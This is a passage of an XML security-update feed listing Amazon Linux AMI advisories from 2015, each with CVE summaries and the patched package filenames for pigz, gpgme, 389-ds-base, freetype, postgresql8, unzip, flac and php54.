arch="i686"><filename>Packages/openssl-1.0.1k-1.84.amzn1.i686.rpm</filename></package><package name="openssl-devel" version="1.0.1k" release="1.84.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-devel-1.0.1k-1.84.amzn1.i686.rpm</filename></package><package name="openssl-static" version="1.0.1k" release="1.84.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-static-1.0.1k-1.84.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-499</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-499: low priority package update for pigz</title><issued date="2015-04-01 13:32:00" /><updated date="2015-04-01 17:01:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-1191:
Multiple directory traversal vulnerabilities in pigz 2.3.1 allow remote attackers to write to arbitrary files via a (1) full pathname or (2) .. (dot dot) in an archive.
1181045:
CVE-2015-1191 pigz: directory traversal vulnerability
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1191" title="" id="CVE-2015-1191" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="pigz" version="2.3.3" release="1.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/pigz-2.3.3-1.6.amzn1.x86_64.rpm</filename></package><package name="pigz-debuginfo" version="2.3.3" release="1.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/pigz-debuginfo-2.3.3-1.6.amzn1.x86_64.rpm</filename></package><package name="pigz" version="2.3.3" release="1.6.amzn1" epoch="0" arch="i686"><filename>Packages/pigz-2.3.3-1.6.amzn1.i686.rpm</filename></package><package name="pigz-debuginfo" version="2.3.3" release="1.6.amzn1" epoch="0" arch="i686"><filename>Packages/pigz-debuginfo-2.3.3-1.6.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-500</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-500: low priority package update for gpgme</title><issued date="2015-04-01 13:32:00" /><updated date="2015-04-01 17:02:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-3564:
Multiple heap-based buffer overflows in the status_handler function in (1) engine-gpgsm.c and (2) engine-uiserver.c in GPGME before 1.5.1 allow remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via vectors related to "different line lengths in a specific order."
1113267:
CVE-2014-3564 gpgme: heap-based buffer overflow in gpgsm status handler
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3564" title="" id="CVE-2014-3564" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="gpgme-devel" version="1.4.3" release="5.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/gpgme-devel-1.4.3-5.15.amzn1.x86_64.rpm</filename></package><package name="gpgme-debuginfo" version="1.4.3" release="5.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/gpgme-debuginfo-1.4.3-5.15.amzn1.x86_64.rpm</filename></package><package name="gpgme" version="1.4.3" release="5.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/gpgme-1.4.3-5.15.amzn1.x86_64.rpm</filename></package><package name="gpgme-devel" version="1.4.3" release="5.15.amzn1" epoch="0" arch="i686"><filename>Packages/gpgme-devel-1.4.3-5.15.amzn1.i686.rpm</filename></package><package name="gpgme" version="1.4.3" release="5.15.amzn1" epoch="0" arch="i686"><filename>Packages/gpgme-1.4.3-5.15.amzn1.i686.rpm</filename></package><package name="gpgme-debuginfo" version="1.4.3" release="5.15.amzn1" epoch="0" arch="i686"><filename>Packages/gpgme-debuginfo-1.4.3-5.15.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-501</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-501: important priority package update for 389-ds-base</title><issued date="2015-04-01 13:49:00" /><updated date="2015-04-01 17:03:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-8112:
It was found that when the nsslapd-unhashed-pw-switch 389 Directory Server configuration option was set to "off", it did not prevent the writing of unhashed passwords into the Changelog. This could potentially allow an authenticated user able to access the Changelog to read sensitive information.
1172729:
CVE-2014-8112 389-ds-base: password hashing bypassed when "nsslapd-unhashed-pw-switch" is set to off
CVE-2014-8105:
An information disclosure flaw was found in the way the 389 Directory Server stored information in the Changelog that is exposed via the 'cn=changelog' LDAP sub-tree. An unauthenticated user could in certain cases use this flaw to read data from the Changelog, which could include sensitive information such as plain-text passwords.
1167858:
CVE-2014-8105 389-ds-base: information disclosure through 'cn=changelog' subtree
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8105" title="" id="CVE-2014-8105" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8112" title="" id="CVE-2014-8112" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="389-ds-base-devel" version="1.3.2.27" release="1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-devel-1.3.2.27-1.27.amzn1.x86_64.rpm</filename></package><package name="389-ds-base" version="1.3.2.27" release="1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-1.3.2.27-1.27.amzn1.x86_64.rpm</filename></package><package name="389-ds-base-debuginfo" version="1.3.2.27" release="1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-debuginfo-1.3.2.27-1.27.amzn1.x86_64.rpm</filename></package><package name="389-ds-base-libs" version="1.3.2.27" release="1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-libs-1.3.2.27-1.27.amzn1.x86_64.rpm</filename></package><package name="389-ds-base-debuginfo" version="1.3.2.27" release="1.27.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-debuginfo-1.3.2.27-1.27.amzn1.i686.rpm</filename></package><package name="389-ds-base-devel" version="1.3.2.27" release="1.27.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-devel-1.3.2.27-1.27.amzn1.i686.rpm</filename></package><package name="389-ds-base-libs" version="1.3.2.27" release="1.27.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-libs-1.3.2.27-1.27.amzn1.i686.rpm</filename></package><package name="389-ds-base" version="1.3.2.27" release="1.27.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-1.3.2.27-1.27.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-502</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-502: important priority package update for freetype</title><issued date="2015-04-01 13:56:00" /><updated date="2015-04-01 17:05:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-9675:
Multiple flaws were found in the way FreeType handled fonts in various formats. If a specially crafted font file was loaded by an application linked against FreeType, it could cause the application to crash or, possibly, disclose a portion of the application memory.
CVE-2014-9674:
Multiple integer overflow flaws and an integer signedness flaw, leading to heap-based buffer overflows, were found in the way FreeType handled Mac fonts. If a specially crafted font file was loaded by an application linked against FreeType, it could cause the application to crash or, potentially, execute arbitrary code with the privileges of the user running the application.
CVE-2014-9673:
Multiple integer overflow flaws and an integer signedness flaw, leading to heap-based buffer overflows, were found in the way FreeType handled Mac fonts. If a specially crafted font file was loaded by an application linked against FreeType, it could cause the application to crash or, potentially, execute arbitrary code with the privileges of the user running the application.
CVE-2014-9671:
Multiple flaws were found in the way FreeType handled fonts in various formats. If a specially crafted font file was loaded by an application linked against FreeType, it could cause the application to crash or, possibly, disclose a portion of the application memory.
CVE-2014-9670:
Multiple flaws were found in the way FreeType handled fonts in various formats. If a specially crafted font file was loaded by an application linked against FreeType, it could cause the application to crash or, possibly, disclose a portion of the application memory.
CVE-2014-9669:
Multiple flaws were found in the way FreeType handled fonts in various formats. If a specially crafted font file was loaded by an application linked against FreeType, it could cause the application to crash or, possibly, disclose a portion of the application memory.
CVE-2014-9667:
Multiple flaws were found in the way FreeType handled fonts in various formats. If a specially crafted font file was loaded by an application linked against FreeType, it could cause the application to crash or, possibly, disclose a portion of the application memory.
CVE-2014-9664:
Multiple flaws were found in the way FreeType handled fonts in various formats. If a specially crafted font file was loaded by an application linked against FreeType, it could cause the application to crash or, possibly, disclose a portion of the application memory.
CVE-2014-9663:
Multiple flaws were found in the way FreeType handled fonts in various formats. If a specially crafted font file was loaded by an application linked against FreeType, it could cause the application to crash or, possibly, disclose a portion of the application memory.
CVE-2014-9661:
Multiple flaws were found in the way FreeType handled fonts in various formats. If a specially crafted font file was loaded by an application linked against FreeType, it could cause the application to crash or, possibly, disclose a portion of the application memory.
CVE-2014-9660:
Multiple flaws were found in the way FreeType handled fonts in various formats. If a specially crafted font file was loaded by an application linked against FreeType, it could cause the application to crash or, possibly, disclose a portion of the application memory.
CVE-2014-9658:
Multiple flaws were found in the way FreeType handled fonts in various formats. If a specially crafted font file was loaded by an application linked against FreeType, it could cause the application to crash or, possibly, disclose a portion of the application memory.
CVE-2014-9657:
Multiple flaws were found in the way FreeType handled fonts in various formats. If a specially crafted font file was loaded by an application linked against FreeType, it could cause the application to crash or, possibly, disclose a portion of the application memory.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9657" title="" id="CVE-2014-9657" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9658" title="" id="CVE-2014-9658" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9660" title="" id="CVE-2014-9660" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9661" title="" id="CVE-2014-9661" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9663" title="" id="CVE-2014-9663" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9664" title="" id="CVE-2014-9664" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9667" title="" id="CVE-2014-9667" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9669" title="" id="CVE-2014-9669" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9670" title="" id="CVE-2014-9670" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9671" title="" id="CVE-2014-9671" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9673" title="" id="CVE-2014-9673" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9674" title="" id="CVE-2014-9674" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9675" title="" id="CVE-2014-9675" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2015:0696.html" title="" id="RHSA-2015:0696" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="freetype-debuginfo" version="2.3.11" release="15.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/freetype-debuginfo-2.3.11-15.14.amzn1.x86_64.rpm</filename></package><package name="freetype-demos" version="2.3.11" release="15.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/freetype-demos-2.3.11-15.14.amzn1.x86_64.rpm</filename></package><package name="freetype-devel" version="2.3.11" release="15.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/freetype-devel-2.3.11-15.14.amzn1.x86_64.rpm</filename></package><package name="freetype" version="2.3.11" release="15.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/freetype-2.3.11-15.14.amzn1.x86_64.rpm</filename></package><package name="freetype-debuginfo" version="2.3.11" release="15.14.amzn1" epoch="0" arch="i686"><filename>Packages/freetype-debuginfo-2.3.11-15.14.amzn1.i686.rpm</filename></package><package name="freetype-demos" version="2.3.11" release="15.14.amzn1" epoch="0" arch="i686"><filename>Packages/freetype-demos-2.3.11-15.14.amzn1.i686.rpm</filename></package><package name="freetype" version="2.3.11" release="15.14.amzn1" epoch="0" arch="i686"><filename>Packages/freetype-2.3.11-15.14.amzn1.i686.rpm</filename></package><package name="freetype-devel" version="2.3.11" release="15.14.amzn1" epoch="0" arch="i686"><filename>Packages/freetype-devel-2.3.11-15.14.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-503</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-503: medium priority package update for postgresql8</title><issued date="2015-04-15 21:47:00" /><updated date="2015-04-15 22:15:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-0244:
A flaw was found in the way PostgreSQL handled certain errors that were generated during protocol synchronization. An authenticated database user could use this flaw to inject queries into an existing connection.
CVE-2015-0243:
A stack-buffer overflow flaw was found in PostgreSQL's pgcrypto module. An authenticated database user could use this flaw to cause PostgreSQL to crash or, potentially, execute arbitrary code with the permissions of the user running PostgreSQL.
CVE-2015-0241:
A buffer overflow flaw was found in the way PostgreSQL handled certain numeric formatting. An authenticated database user could use a specially crafted timestamp formatting template to cause PostgreSQL to crash or, under certain conditions, execute arbitrary code with the permissions of the user running PostgreSQL.
CVE-2014-8161:
An information leak flaw was found in the way the PostgreSQL database server handled certain error messages. An authenticated database user could possibly obtain the results of a query they did not have privileges to execute by observing the constraint violation error messages produced when the query was executed.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8161" title="" id="CVE-2014-8161" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0241" title="" id="CVE-2015-0241" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0243" title="" id="CVE-2015-0243" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0244" title="" id="CVE-2015-0244" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2015:0750.html" title="" id="RHSA-2015:0750" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="postgresql8-debuginfo" version="8.4.20" release="2.48.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-debuginfo-8.4.20-2.48.amzn1.x86_64.rpm</filename></package><package name="postgresql8-pltcl" version="8.4.20" release="2.48.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-pltcl-8.4.20-2.48.amzn1.x86_64.rpm</filename></package><package name="postgresql8-devel" version="8.4.20" release="2.48.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-devel-8.4.20-2.48.amzn1.x86_64.rpm</filename></package><package name="postgresql8-plpython" version="8.4.20" release="2.48.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-plpython-8.4.20-2.48.amzn1.x86_64.rpm</filename></package><package name="postgresql8-contrib" version="8.4.20" release="2.48.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-contrib-8.4.20-2.48.amzn1.x86_64.rpm</filename></package><package name="postgresql8-plperl" version="8.4.20" release="2.48.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-plperl-8.4.20-2.48.amzn1.x86_64.rpm</filename></package><package name="postgresql8-test" version="8.4.20" release="2.48.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-test-8.4.20-2.48.amzn1.x86_64.rpm</filename></package><package name="postgresql8-docs" version="8.4.20" release="2.48.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-docs-8.4.20-2.48.amzn1.x86_64.rpm</filename></package><package name="postgresql8" version="8.4.20" release="2.48.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-8.4.20-2.48.amzn1.x86_64.rpm</filename></package><package name="postgresql8-libs" version="8.4.20" release="2.48.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-libs-8.4.20-2.48.amzn1.x86_64.rpm</filename></package><package name="postgresql8-server" version="8.4.20" release="2.48.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-server-8.4.20-2.48.amzn1.x86_64.rpm</filename></package><package name="postgresql8-plpython" version="8.4.20" release="2.48.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-plpython-8.4.20-2.48.amzn1.i686.rpm</filename></package><package name="postgresql8-plperl" version="8.4.20" release="2.48.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-plperl-8.4.20-2.48.amzn1.i686.rpm</filename></package><package name="postgresql8-docs" version="8.4.20" release="2.48.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-docs-8.4.20-2.48.amzn1.i686.rpm</filename></package><package name="postgresql8-libs" version="8.4.20" release="2.48.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-libs-8.4.20-2.48.amzn1.i686.rpm</filename></package><package name="postgresql8" version="8.4.20" release="2.48.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-8.4.20-2.48.amzn1.i686.rpm</filename></package><package name="postgresql8-debuginfo" version="8.4.20" release="2.48.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-debuginfo-8.4.20-2.48.amzn1.i686.rpm</filename></package><package name="postgresql8-server" version="8.4.20" release="2.48.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-server-8.4.20-2.48.amzn1.i686.rpm</filename></package><package name="postgresql8-contrib" version="8.4.20" release="2.48.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-contrib-8.4.20-2.48.amzn1.i686.rpm</filename></package><package name="postgresql8-pltcl" version="8.4.20" release="2.48.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-pltcl-8.4.20-2.48.amzn1.i686.rpm</filename></package><package name="postgresql8-test" version="8.4.20" release="2.48.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-test-8.4.20-2.48.amzn1.i686.rpm</filename></package><package name="postgresql8-devel" version="8.4.20" release="2.48.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-devel-8.4.20-2.48.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-504</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-504: medium priority package update for unzip</title><issued date="2015-04-15 21:48:00" /><updated date="2015-04-15 22:15:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-9636:
A buffer overflow was found in the way unzip uncompressed certain extra fields of a file. A specially crafted Zip archive could cause unzip to crash or, possibly, execute arbitrary code when the archive was tested with unzip's '-t' option.
CVE-2014-8141:
A buffer overflow flaw was found in the way unzip handled Zip64 files. A specially crafted Zip archive could possibly cause unzip to crash when the archive was uncompressed.
CVE-2014-8140:
An integer underflow flaw, leading to a buffer overflow, was found in the way unzip uncompressed certain extra fields of a file. A specially crafted Zip archive could cause unzip to crash when the archive was tested with unzip's '-t' option.
CVE-2014-8139:
A buffer overflow flaw was found in the way unzip computed the CRC32 checksum of certain extra fields of a file. A specially crafted Zip archive could cause unzip to crash when the archive was tested with unzip's '-t' option.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8139" title="" id="CVE-2014-8139" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8140" title="" id="CVE-2014-8140" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8141" title="" id="CVE-2014-8141" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9636" title="" id="CVE-2014-9636" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2015:0700.html" title="" id="RHSA-2015:0700" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="unzip-debuginfo" version="6.0" release="2.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/unzip-debuginfo-6.0-2.9.amzn1.x86_64.rpm</filename></package><package name="unzip" version="6.0" release="2.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/unzip-6.0-2.9.amzn1.x86_64.rpm</filename></package><package name="unzip-debuginfo" version="6.0" release="2.9.amzn1" epoch="0" arch="i686"><filename>Packages/unzip-debuginfo-6.0-2.9.amzn1.i686.rpm</filename></package><package name="unzip" version="6.0" release="2.9.amzn1" epoch="0" arch="i686"><filename>Packages/unzip-6.0-2.9.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-505</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-505: important priority package update for flac</title><issued date="2015-04-15 21:48:00" /><updated date="2015-04-15 22:16:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-9028:
A buffer overflow flaw was found in the way flac decoded FLAC audio files. An attacker could create a specially crafted FLAC audio file that could cause an application using the flac library to crash or execute arbitrary code when the file was read.
CVE-2014-8962:
A buffer over-read flaw was found in the way flac processed certain ID3v2 metadata. An attacker could create a specially crafted FLAC audio file that could cause an application using the flac library to crash when the file was read.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8962" title="" id="CVE-2014-8962" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9028" title="" id="CVE-2014-9028" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2015:0767.html" title="" id="RHSA-2015:0767" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="flac-devel" version="1.2.1" release="7.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/flac-devel-1.2.1-7.7.amzn1.x86_64.rpm</filename></package><package name="flac" version="1.2.1" release="7.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/flac-1.2.1-7.7.amzn1.x86_64.rpm</filename></package><package name="flac-debuginfo" version="1.2.1" release="7.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/flac-debuginfo-1.2.1-7.7.amzn1.x86_64.rpm</filename></package><package name="flac" version="1.2.1" release="7.7.amzn1" epoch="0" arch="i686"><filename>Packages/flac-1.2.1-7.7.amzn1.i686.rpm</filename></package><package name="flac-devel" version="1.2.1" release="7.7.amzn1" epoch="0" arch="i686"><filename>Packages/flac-devel-1.2.1-7.7.amzn1.i686.rpm</filename></package><package name="flac-debuginfo" version="1.2.1" release="7.7.amzn1" epoch="0" arch="i686"><filename>Packages/flac-debuginfo-1.2.1-7.7.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-506</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-506: important priority package update for php54</title><issued date="2015-04-15 21:49:00" /><updated date="2015-04-15 22:21:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-2331:
An integer overflow flaw, leading to a heap-based buffer overflow, was found in the way libzip, which is also embedded in PHP, processed certain ZIP archives. If an attacker were able to supply a specially crafted ZIP archive to an application using libzip, it could cause the application to crash or, possibly, execute arbitrary code.
1204676:
CVE-2015-2331 libzip: integer overflow when processing ZIP archives
CVE-2015-2305:
Integer overflow in the regcomp implementation in the Henry Spencer BSD regex library (aka rxspencer) alpha3.8.g5 on 32-bit platforms, as used in NetBSD through 6.1.5 and other products, might allow context-dependent attackers to execute arbitrary code via a large regular expression that leads to a heap-based buffer overflow.
1191049:
CVE-2015-2305 regex: heap overflow in regcomp() on 32-bit architectures
CVE-2015-0231:
Use-after-free vulnerability in the process_nested_data function in ext/standard/var_unserializer.re in PHP before 5.4.37, 5.5.x before 5.5.21, and 5.6.x before 5.6.5 allows remote attackers to execute arbitrary code via a crafted unserialize call that leverages improper handling of duplicate numerical keys within the serialized properties of an object. NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-8142.
A use-after-free flaw was found in the way PHP's unserialize() function processed data. If a remote attacker was able to pass crafted input to PHP's unserialize() function, they could cause the PHP interpreter to crash or, possibly, execute arbitrary code.
1185397:
CVE-2015-0231 php: use after free vulnerability in unserialize() (incomplete fix of CVE-2014-8142)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0231" title="" id="CVE-2015-0231" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2305" title="" id="CVE-2015-2305" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2331" title="" id="CVE-2015-2331" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php54-mssql" version="5.4.39" release="1.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mssql-5.4.39-1.67.amzn1.x86_64.rpm</filename></package><package name="php54-mysqlnd" version="5.4.39" release="1.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mysqlnd-5.4.39-1.67.amzn1.x86_64.rpm</filename></package><package name="php54-dba" version="5.4.39" release="1.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-dba-5.4.39-1.67.amzn1.x86_64.rpm</filename></package><package name="php54-odbc" version="5.4.39" release="1.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-odbc-5.4.39-1.67.amzn1.x86_64.rpm</filename></package><package name="php54-imap" version="5.4.39" release="1.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-imap-5.4.39-1.67.amzn1.x86_64.rpm</filename></package><package name="php54-pspell" version="5.4.39" release="1.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-pspell-5.4.39-1.67.amzn1.x86_64.rpm</filename></package><package name="php54-embedded" version="5.4.39" release="1.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-embedded-5.4.39-1.67.amzn1.x86_64.rpm</filename></package><package name="php54-xmlrpc" version="5.4.39" release="1.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-xmlrpc-5.4.39-1.67.amzn1.x86_64.rpm</filename></package><package name="php54-debuginfo" version="5.4.39" release="1.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-debuginfo-5.4.39-1.67.amzn1.x86_64.rpm</filename></package><package name="php54-fpm" version="5.4.39" release="1.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-fpm-5.4.39-1.67.amzn1.x86_64.rpm</filename></package><package name="php54-tidy" version="5.4.39" release="1.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-tidy-5.4.39-1.67.amzn1.x86_64.rpm</filename></package><package name="php54-recode" version="5.4.39" release="1.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-recode-5.4.39-1.67.amzn1.x86_64.rpm</filename></package><package name="php54-cli" version="5.4.39" release="1.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-cli-5.4.39-1.67.amzn1.x86_64.rpm</filename></package><package name="php54" version="5.4.39" release="1.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-5.4.39-1.67.amzn1.x86_64.rpm</filename></package><package name="php54-ldap" version="5.4.39" release="1.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-ldap-5.4.39-1.67.amzn1.x86_64.rpm</filename></package><package name="php54-xml" version="5.4.39" release="1.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-xml-5.4.39-1.67.amzn1.x86_64.rpm</filename></package><package name="php54-process" version="5.4.39" release="1.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-process-5.4.39-1.67.amzn1.x86_64.rpm</filename></package><package name="php54-common" version="5.4.39" release="1.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-common-5.4.39-1.67.amzn1.x86_64.rpm</filename></package><package name="php54-bcmath" version="5.4.39" release="1.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-bcmath-5.4.39-1.67.amzn1.x86_64.rpm</filename></package><package name="php54-snmp" version="5.4.39" release="1.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-snmp-5.4.39-1.67.amzn1.x86_64.rpm</filename></package><package name="php54-gd" version="5.4.39" release="1.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-gd-5.4.39-1.67.amzn1.x86_64.rpm</filename></package><package name="php54-devel" version="5.4.39" release="1.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-devel-5.4.39-1.67.amzn1.x86_64.rpm</filename></package><package name="php54-mysql" version="5.4.39" release="1.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mysql-5.4.39-1.67.amzn1.x86_64.rpm</filename></package><package name="php54-mcrypt" version="5.4.39" release="1.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mcrypt-5.4.39-1.67.amzn1.x86_64.rpm</filename></package><package name="php54-pdo" version="5.4.39" release="1.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-pdo-5.4.39-1.67.amzn1.x86_64.rpm</filename></package><package name="php54-enchant" version="5.4.39" release="1.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-enchant-5.4.39-1.67.amzn1.x86_64.rpm</filename></package><package name="php54-soap" version="5.4.39" release="1.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-soap-5.4.39-1.67.amzn1.x86_64.rpm</filename></package><package name="php54-pgsql" 